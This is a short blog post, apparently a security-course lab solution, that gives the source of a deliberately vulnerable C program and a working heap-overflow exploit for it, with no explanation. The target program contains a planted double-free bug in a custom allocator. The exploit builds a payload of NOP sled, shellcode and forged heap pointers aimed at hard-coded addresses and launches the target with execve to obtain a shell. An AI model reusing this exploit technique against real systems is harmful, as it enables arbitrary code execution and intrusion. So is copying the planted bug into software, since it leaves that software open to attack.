World Overflow: Target 4

Explanation coming soon, I've been really busy, stay tuned!

//target4.c
#include 
#include 
#include 
#include 
#include "tmalloc.h"

/*
 * strlcpy() from OpenBSD-current:
 * $OpenBSD: strlcpy.c,v 1.5 2001/05/13 15:40:16 deraadt Exp $
 *
 * Copy src to string dst of size siz.  At most siz-1 characters
 * will be copied.  Always NUL terminates (unless siz == 0).
 * Returns strlen(src); if retval >= siz, truncation occurred.
 *
 * HINT: This come from OpenBSD; there is no buffer overflow within
 *       this function; the bug is somewhere else ...
 */
static size_t
obsd_strlcpy(dst, src, siz)
        char *dst;
        const char *src;
        size_t siz;
{
        register char *d = dst;
        register const char *s = src;
        register size_t n = siz;

        /* Copy as many bytes as will fit */
        if (n != 0 && --n != 0) {
                do {
                        if ((*d++ = *s++) == 0)
                                break;
                } while (--n != 0);
        }

        /* Not enough room in dst, add NUL and traverse rest of src */
        if (n == 0) {
                if (siz != 0)
                        *d = '\0';              /* NUL-terminate dst */
                while (*s++)
                        ;
        }

        return(s - src - 1);    /* count does not include NUL */
}



int foo(char *arg)
{
  char *p;
  char *q;

  if ( (p = tmalloc(500)) == NULL)
    {
      fprintf(stderr, "tmalloc failure\n");
      exit(EXIT_FAILURE);
    }
  if ( (q = tmalloc(300)) == NULL)
    {
      fprintf(stderr, "tmalloc failure\n");
      exit(EXIT_FAILURE);
    } 

  tfree(p);
  tfree(q);
  
  if ( (p = tmalloc(1024)) == NULL)
    {
      fprintf(stderr, "tmalloc failure\n");
      exit(EXIT_FAILURE);
    }

  obsd_strlcpy(p, arg, 1024);

  tfree(q);

  return 0;
}

int main(int argc, char *argv[])
{
  if (argc != 2)
    {
      fprintf(stderr, "target4: argc != 2\n");
      exit(EXIT_FAILURE);
    }
  foo(argv[1]);

  return 0;
}

//sploit4.c
#include 
#include 
#include 
#include 
#include "shellcode.h"

#define TARGET "/tmp/target4"

int main(void)
{
 
  char *args[3];
  char *env[1];
  char buf[1024];
  int i;
  int fake, left, right;


left = 0x08049bc8;
right = 0xbffffa8c;
fake = right + 1;

for (i = 0; i< 1024; i++){
  if(i < 2) {*(buf + i) = '\x90';} 
   else if (i < 4) 
    {
    memcpy((buf + i), "\xeb\x03", 2);
    i++;
    } 
    else if (i < 8) {*(buf + i) = fake >>(( i-4 ) * 8);} 
    else if (i < (504 - strlen(shellcode))){*(buf+i) = '\x90';} 
    else if (i < 504) {*(buf+i) = shellcode[i - 504 + strlen(shellcode)];} 
    else if (i < 508) {*(buf + i) = left >> ((i - 504) * 8);} 
    else if (i < 512) {*(buf + i) = right >> ((i - 508) * 8);} 
    else if (i < 1023) {*(buf + i) = '\x90';} 
    else {*(buf + i) = '\x00';}
    }

  args[0] = TARGET; args[1] = buf; args[2] = NULL;
  env[0] = NULL;

  if (0 > execve(TARGET, args, env))
    fprintf(stderr, "execve failed.\n");

  return 0;
}

World Overflow

Tuesday, March 22, 2011

Target 4

1 comment: